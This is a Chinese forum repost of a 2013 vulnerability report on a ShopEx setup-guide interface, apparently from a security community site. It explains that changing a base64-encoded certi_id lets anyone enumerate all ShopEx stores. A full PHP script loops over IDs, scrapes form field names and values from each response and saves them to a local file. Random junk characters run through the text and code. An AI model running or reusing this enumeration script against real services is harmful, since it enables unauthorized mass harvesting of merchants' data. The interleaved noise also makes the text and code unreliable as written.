|
|
简要描述:/ }1 n0 G; @* l: c; d4 F& d7 z7 y
ShopEx某接口缺陷,可遍历所有网站
" z# r. r) |7 B7 N; [4 @详细说明:
; H" W0 B$ q( }2 [+ Z2 f问题出现在shopex 网店使用向导页面 / m/ b: O# Q. E: E2 w% ~8 o2 Z! y
# e- w! I. c6 K9 k" E
$ F: O/ Q/ `/ o) z c6 T
y# X* b$ I3 s& X8 g7 B/ Bhttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
: L/ p2 Y7 Z% Z& @4 B& t2 R; x0 ]# e# J9 d& f1 r1 E" L" D4 T
$ O9 y7 ~* J& F& m8 T X% K T0 D# X. N8 _) p/ i
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}( O) K1 i: `3 c* W3 ~
2 s9 l1 @" a5 x! ^( G' p- f
% S, m2 G$ `$ I% M$ b1 z
* k' r# k( ?/ {6 W我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 3 I7 E: [0 d) w; E0 W& p
. h/ o3 k3 V0 f2 j
* `8 l# d/ I0 o# _! I) r1 z9 K2 w5 h' `) c% j2 S
<?php3 J: a, O$ b$ f
; {9 i+ V# t" a4 i7 |) e% n1 G for ($i=1; $i < 10000; $i++) { //遍历/ L3 ?% R1 m- w* w! @. u! a
* p8 s2 s" r+ J3 z- |
ShowshopExD($i);1 k$ p7 H* p/ j; X/ F
; J/ U" B# L- F) d6 J } Q9 I" j9 o( G9 w" _! u* H
, B. e/ ^$ n9 v# A function ShowshopExD($cid) {
2 \8 S9 M7 A0 M% S7 r7 l; w- W
9 |- G# P6 G% h$ q3 L" l! b; G $url='http://guide.ecos.shopex.cn/step2.php';
+ h$ s# Q1 _' k4 k5 m- u7 ]3 d3 x" s* Y$ I* j' V/ L0 ^0 S
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');0 r8 v, ?% T( Z( c; }4 F E) O
0 h( i. [! `( b
$url = $url.'?refer='.$refer;; [( n5 O5 [# ^
: f+ B1 d- \" Y2 W( y1 v) d $ch = curl_init($url);7 _8 q! Q% I" {, F7 t
- t" V( q( M& Q) N; F curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
3 n$ m1 J+ r9 c- Y. F8 b: q
" g- d8 V- X6 z0 G. F curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
+ I5 t% U$ A' T- O8 ?' }6 c
9 [: F4 |( V V5 f j $result = curl_exec($ch);
& M) E4 T# ]4 Q
- | c/ l$ t' P* @) l' S $result = mb_convert_encoding($result, "gb2312", "UTF-8");
7 y9 G. P* W/ t) X# S6 `+ w% B4 |. _& W T
if(strpos($result,$refer))
2 e" J8 c6 G2 r3 h0 v& ^0 N' r9 {& G( \) o' n
{. a: B! `: ^$ y) Z8 R$ @
8 Q; a1 V% R* t( M& b $fp = fopen("c:/shopEx.txt",'ab'); //保存文件2 i: u; L' Q8 T% z5 v" W
2 [$ s/ g9 i5 |- N& j0 }8 X0 u preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);$ Q2 q! A& p2 |% E; h; G; I" a0 Z
( C( ^# @9 F8 ~) H
foreach ($value[1] as $key) {
- x" k. c; ]% Q* v1 ]: ]! w' e/ N+ C0 M& B
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);0 d0 ~, D- r+ K" y( m+ @! C& O
8 R4 z6 t+ G; V) x
echo $res[1][0].':'.$res[3][0]."\r\n";/ s# r9 @( j- P0 D# l! Q; {
3 x# j, ~- K }% U $col =$res[1][0].':'.$res[3][0]."\r\n"; 0 r& N( X- n" \* _* H) ?5 z
* |+ S; ~1 J# u
fwrite($fp, $col, strlen($col)); 7 b5 {' c9 g% U
, u/ o% \" I/ d4 r. y$ m }: g, z1 B# T: Y, j
/ M6 B/ r) w# Y! v echo '--------------------------------'."\r\n";
* ~! C9 |' m' X6 d
! b6 v3 I* N5 l0 u* C& t fclose($fp);
+ w4 S7 _( q B( O
6 i: o: Q! T2 o2 F$ e }2 y, j/ a* m- F5 h6 }0 Z/ d
1 F0 X, M4 C# w( [
flush();
8 A: L7 I. v+ U# E/ L" Y6 ?9 v5 \: }: v& {/ h0 e% \5 i
curl_close($ch);
0 z5 Z" U" E$ y# A
2 a' V. L) p3 v9 s" J1 ? }
5 q/ b+ a) P' b3 N( l* j9 q) x! E" W6 E o7 e( `1 _8 q2 [0 e
?>5 ^( P& z6 q. A2 T6 D! Q, M
漏洞证明:
+ {) Q5 o6 O6 a1 K* z9 P- V4 _http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
! i; i6 |: T; y: T, l+ |2 lrefer换成其他加密方式3 K$ z. J* T. ?
|
|
发表于 2013-9-21 15:59:47
收藏
支持
反对